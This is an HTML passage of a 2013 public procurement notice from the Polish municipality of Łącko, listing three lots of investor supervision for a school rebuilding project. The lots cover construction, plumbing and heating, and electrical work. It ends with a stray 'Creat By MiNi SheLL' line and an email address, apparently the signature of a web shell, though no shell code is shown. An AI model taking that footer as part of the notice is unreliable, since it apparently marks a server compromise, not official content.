i) sytuacji, gdy Wykonawca opierał się na zasobach podmiotów trzecich wykazując spełnienie warunków udziału                           w postępowaniu, dopuszcza się zmianę tych podmiotów na etapie realizacji zamówienia, pod warunkiem, że nowy podmiot wykaże spełnienie warunków w zakresie nie mniejszym niż wskazany na etapie postępowania o zamówienie publiczne;
j) zmian regulacji prawnych obowiązujących w dniu zawarcia umowy
k) zmian teleadresowych Stron umowy określonych w umowie;
l) zmian korzystnych dla Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lacko.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Łącko
33-390 Łącko 445 pok. 21.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.09.2013 godzina 09:45, miejsce: Urząd Gminy Łącko
33-390 Łącko 445 pok. 10.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Dofinansowanie ze środków krajowych.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1: Branża  konstrukcyjno - budowlana.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest pełnienie  nadzoru inwestorskiego  następujących   robót  budowlanych i czynności :  
ETAP  I:
- rozbiórka  istniejącego  budynku  szkolnego i gospodarczego,  
- wykonanie robót ziemnych,
- wykonanie fundamentów, elementów nadziemia (  kl. schodowe i pozostałe)
- wykonanie   elementów żelbetowych,
- wykonanie dachu - konstrukcja i pokrycie
- wykonanie robót murowych,
- wykonanie obróbek blacharskich i orynnowania,
- wykonanie stolarki okiennej i drzwiowej,
-  wykonanie tynków  i okładzin
- oznakowanie robót zgodnie z Instrukcją  o oznakowaniu  robót drogowych i zgodnie  z projektem organizacji ruchu opracowanym przez Wykonawcę robót
- wszelkie prace przygotowawcze, rozbiórkowe, demontażowe, odtworzeniowe, porządkowe,
- inne niewymienione  wyżej zadania niezbędne do prawidłowego wykonania zamówienia np. przełożenie lub  likwidacja niezinwentaryzowanych urządzeń podziemnych ,
- na czas robót zabezpieczenie przejścia  dla  dzieci uczęszczających  do istniejącej szkoły,
- urządzenie zaplecza budowy oraz zabezpieczenie  we własnym zakresie w media  itp.,
- zabezpieczenie robót pod względem BHP - dotyczy również zabezpieczenia warunków bezpieczeństwa  wszystkich osób upoważnionych do przebywania na placu budowy,
- pokrycia szkód powstałych w trakcie realizacji zamówienia również  wobec osób trzecich,
- przywrócenie do stanu pierwotnego zajętych dla realizacji zamówienia  terenów,
- w imieniu Zamawiającego uzyskanie  zezwolenia na zajęcie pasa drogowego i porycia kosztów  wynikających  z tej decyzji,
- w imieniu Zamawiającego uzyskanie  zezwolenia na umieszczenie urządzeń  w pasie drogowym
- prowadzenie dokumentacji fotograficznej z postępujących prac budowlanych
- pełna obsługa  geodezyjna wraz z inwentaryzacją powykonawczą w 2 egzemplarzach w skali 1:1000  z naniesionymi numerami działek, 
ETAP II:
- pomieszczenia kotłowni;
- posadzki;
- roboty malarskie;
- elementy ślusarskie;
- roboty wewnętrzne
- elewacja;
-  winda osobowa
- zadaszenie - daszki;
- pochylnia dla niepełnosprawnych, schody główne i zewnętrzne;
- opaska przy budynku;
- chodniki;
- zagospodarowanie terenu;
- ogrodzenie
- oznakowanie robót zgodnie z Instrukcją  o oznakowaniu  robót drogowych i zgodnie  z projektem organizacji ruchu opracowanym przez Wykonawcę robót
- wszelkie prace przygotowawcze, rozbiórkowe, demontażowe, odtworzeniowe, porządkowe,
- inne niewymienione  wyżej zadania niezbędne do prawidłowego wykonania zamówienia np. przełożenie lub  likwidacja niezinwentaryzowanych urządzeń podziemnych ,
- na czas robót zabezpieczenie przejścia  dla  dzieci uczęszczających  do istniejącej szkoły,
- urządzenie zaplecza budowy oraz zabezpieczenie  we własnym zakresie w media  itp.,
- zabezpieczenie robót pod względem BHP - dotyczy również zabezpieczenia warunków bezpieczeństwa  wszystkich osób upoważnionych do przebywania na placu budowy,
- pokrycia szkód powstałych w trakcie realizacji zamówienia również  wobec osób trzecich,
- przywrócenie do stanu pierwotnego zajętych dla realizacji zamówienia  terenów,
- w imieniu Zamawiającego uzyskanie  zezwolenia na zajęcie pasa drogowego i porycia kosztów  wynikających  z tej decyzji,
- w imieniu Zamawiającego uzyskanie  zezwolenia na umieszczenie urządzeń  w pasie drogowym
- prowadzenie dokumentacji fotograficznej z postępujących prac budowlanych
- pełna obsługa  geodezyjna wraz z inwentaryzacją powykonawczą w 3 egzemplarzach w skali 1:1000 oraz w skali 1 : 500    z naniesionymi numerami działek, 
-  w imieniu Zamawiającego uzyskania w PINB decyzji o pozwoleniu na użytkowanie.
Szczegółowy opis i zakres robót określają Szczegółowe Specyfikacje Techniczne (SST), przedmiar robót   dokumentacja projektowa dostępne  są na stronie  www.lacko.pl  przetargi w BIP w postępowaniu dot. robót budowlanych ww. zadania. 
Zamawiający zastrzega sobie prawo odstąpienia od umowy zarówno co do I jak i II etapu  bez skutków prawnych, w tym uiszczenia kar przez Zamawiającego, jeżeli Zamawiający nie uzyska finansowania na realizację I lub II etapu.
Miejsce wykonania zamówienia: Łącko Gmina Łącko.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2: Branża  instalacyjna  w  zakresie sieci, instalacji i urządzeń c.o.,sanitarnych wodociągowych  i kanalizacyjnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest pełnienie  nadzoru inwestorskiego  następujących   robót  budowlanych i czynności :  
ETAP  I:
- przełożenie  przyłacza wodociągowego,  przyłącz  wodociągowy, przyłącz kanalizacji sanitarnej, przyłącz kanalizacji  deszczowej,
- wykonanie  instalacji wod - kan., p. poż.
- oznakowanie robót zgodnie z Instrukcją  o oznakowaniu  robót drogowych i zgodnie  z projektem organizacji ruchu opracowanym przez Wykonawcę robót
- wszelkie prace przygotowawcze, rozbiórkowe, demontażowe, odtworzeniowe, porządkowe,
- inne niewymienione  wyżej zadania niezbędne do prawidłowego wykonania zamówienia np. przełożenie lub  likwidacja niezinwentaryzowanych urządzeń podziemnych ,
- na czas robót zabezpieczenie przejścia  dla  dzieci uczęszczających  do istniejącej szkoły,
- urządzenie zaplecza budowy oraz zabezpieczenie  we własnym zakresie w media  itp.,
- zabezpieczenie robót pod względem BHP - dotyczy również zabezpieczenia warunków bezpieczeństwa  wszystkich osób upoważnionych do przebywania na placu budowy,
- pokrycia szkód powstałych w trakcie realizacji zamówienia również  wobec osób trzecich,
- przywrócenie do stanu pierwotnego zajętych dla realizacji zamówienia  terenów,
- w imieniu Zamawiającego uzyskanie  zezwolenia na zajęcie pasa drogowego i porycia kosztów  wynikających  z tej decyzji,
- w imieniu Zamawiającego uzyskanie  zezwolenia na umieszczenie urządzeń  w pasie drogowym
- prowadzenie dokumentacji fotograficznej z postępujących prac budowlanych
- pełna obsługa  geodezyjna wraz z inwentaryzacją powykonawczą w 2 egzemplarzach w skali 1:1000  z naniesionymi numerami działek, 

ETAP II:
- przełożenie przyłącza  wodociągowego, przyłącz wodociągowy, przyłącz kanalizacji sanitarnej, przyłącz kanalizacji deszczowej;
- instalacja wod - kan., p.poż;
- wentylacja mechaniczna;
- instalacja centralnego ogrzewania;
- kotłownia olejowa;
- oznakowanie robót zgodnie z Instrukcją  o oznakowaniu  robót drogowych i zgodnie  z projektem organizacji ruchu opracowanym przez Wykonawcę robót
- wszelkie prace przygotowawcze, rozbiórkowe, demontażowe, odtworzeniowe, porządkowe,
- inne niewymienione  wyżej zadania niezbędne do prawidłowego wykonania zamówienia np. przełożenie lub  likwidacja niezinwentaryzowanych urządzeń podziemnych ,
- na czas robót zabezpieczenie przejścia  dla  dzieci uczęszczających  do istniejącej szkoły,
- urządzenie zaplecza budowy oraz zabezpieczenie  we własnym zakresie w media  itp.,
- zabezpieczenie robót pod względem BHP - dotyczy również zabezpieczenia warunków bezpieczeństwa  wszystkich osób upoważnionych do przebywania na placu budowy,
- pokrycia szkód powstałych w trakcie realizacji zamówienia również  wobec osób trzecich,
- przywrócenie do stanu pierwotnego zajętych dla realizacji zamówienia  terenów,
- w imieniu Zamawiającego uzyskanie  zezwolenia na zajęcie pasa drogowego i porycia kosztów  wynikających  z tej decyzji,
- w imieniu Zamawiającego uzyskanie  zezwolenia na umieszczenie urządzeń  w pasie drogowym
- prowadzenie dokumentacji fotograficznej z postępujących prac budowlanych
- pełna obsługa  geodezyjna wraz z inwentaryzacją powykonawczą w 3 egzemplarzach w skali 1:1000 oraz w skali 1 : 500 z naniesionymi numerami działek, 
-  w imieniu Zamawiającego uzyskania w PINB decyzji o pozwoleniu na użytkowanie
Szczegółowy opis i zakres robót określają Szczegółowe Specyfikacje Techniczne (SST), przedmiar robót   dokumentacja projektowa dostępne  są na stronie  www.lacko.pl  przetargi w BIP w postępowaniu dot. robót budowlanych ww. zadania. 
Zamawiający zastrzega sobie prawo odstąpienia od umowy zarówno co do I jak i II etapu  bez skutków prawnych, w tym uiszczenia kar przez Zamawiającego, jeżeli Zamawiający nie uzyska finansowania na realizację I lub II etapu.
Miejsce wykonania zamówienia: Łącko Gmina Łącko.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr 3: Branża  instalacyjna  w  zakresie sieci, instalacji i urządzeń elektrycznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest pełnienie  nadzoru inwestorskiego  następujących   robót  budowlanych i czynności :  
ETAP  I:
- wykonanie instalacji elektrycznej,
- oznakowanie robót zgodnie z Instrukcją  o oznakowaniu  robót drogowych i zgodnie  z projektem organizacji ruchu opracowanym przez Wykonawcę robót
- wszelkie prace przygotowawcze, rozbiórkowe, demontażowe, odtworzeniowe, porządkowe,
- inne niewymienione  wyżej zadania niezbędne do prawidłowego wykonania zamówienia np. przełożenie lub  likwidacja niezinwentaryzowanych urządzeń podziemnych ,
- na czas robót zabezpieczenie przejścia  dla  dzieci uczęszczających  do istniejącej szkoły,
- urządzenie zaplecza budowy oraz zabezpieczenie  we własnym zakresie w media  itp.,
- zabezpieczenie robót pod względem BHP - dotyczy również zabezpieczenia warunków bezpieczeństwa  wszystkich osób upoważnionych do przebywania na placu budowy,
- pokrycia szkód powstałych w trakcie realizacji zamówienia również  wobec osób trzecich,
- przywrócenie do stanu pierwotnego zajętych dla realizacji zamówienia  terenów,
- w imieniu Zamawiającego uzyskanie  zezwolenia na zajęcie pasa drogowego i porycia kosztów  wynikających  z tej decyzji,
- w imieniu Zamawiającego uzyskanie  zezwolenia na umieszczenie urządzeń  w pasie drogowym
- prowadzenie dokumentacji fotograficznej z postępujących prac budowlanych
- pełna obsługa  geodezyjna wraz z inwentaryzacją powykonawczą w 2 egzemplarzach w skali 1:1000  z naniesionymi numerami działek, 

ETAP II:
- instalacja elektryczna;
-  wyposażenie w elektryczne urządzenia kuchenne w  zabudowie wyspowej;
- oznakowanie robót zgodnie z Instrukcją  o oznakowaniu  robót drogowych i zgodnie  z projektem organizacji ruchu opracowanym przez Wykonawcę robót
- wszelkie prace przygotowawcze, rozbiórkowe, demontażowe, odtworzeniowe, porządkowe,
- inne niewymienione  wyżej zadania niezbędne do prawidłowego wykonania zamówienia np. przełożenie lub  likwidacja niezinwentaryzowanych urządzeń podziemnych ,
- na czas robót zabezpieczenie przejścia  dla  dzieci uczęszczających  do istniejącej szkoły,
- urządzenie zaplecza budowy oraz zabezpieczenie  we własnym zakresie w media  itp.,
- zabezpieczenie robót pod względem BHP - dotyczy również zabezpieczenia warunków bezpieczeństwa  wszystkich osób upoważnionych do przebywania na placu budowy,
- pokrycia szkód powstałych w trakcie realizacji zamówienia również  wobec osób trzecich,
- przywrócenie do stanu pierwotnego zajętych dla realizacji zamówienia  terenów,
- w imieniu Zamawiającego uzyskanie  zezwolenia na zajęcie pasa drogowego i porycia kosztów  wynikających  z tej decyzji,
- w imieniu Zamawiającego uzyskanie  zezwolenia na umieszczenie urządzeń  w pasie drogowym
- prowadzenie dokumentacji fotograficznej z postępujących prac budowlanych
- pełna obsługa  geodezyjna wraz z inwentaryzacją powykonawczą w 3 egzemplarzach w skali 1:1000 oraz w skali 1 : 500                      z naniesionymi numerami działek, 
-  w imieniu Zamawiającego uzyskania w PINB decyzji o pozwoleniu na użytkowanie 

Szczegółowy opis i zakres robót określają Szczegółowe Specyfikacje Techniczne (SST), przedmiar robót   dokumentacja projektowa dostępne  są na stronie  www.lacko.pl  przetargi w BIP w postępowaniu dot. robót budowlanych ww. zadania. 
Zamawiający zastrzega sobie prawo odstąpienia od umowy zarówno co do I jak i II etapu  bez skutków prawnych, w tym uiszczenia kar przez Zamawiającego, jeżeli Zamawiający nie uzyska finansowania na realizację I lub II etapu.
Miejsce wykonania zamówienia: Łącko Gmina Łącko.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com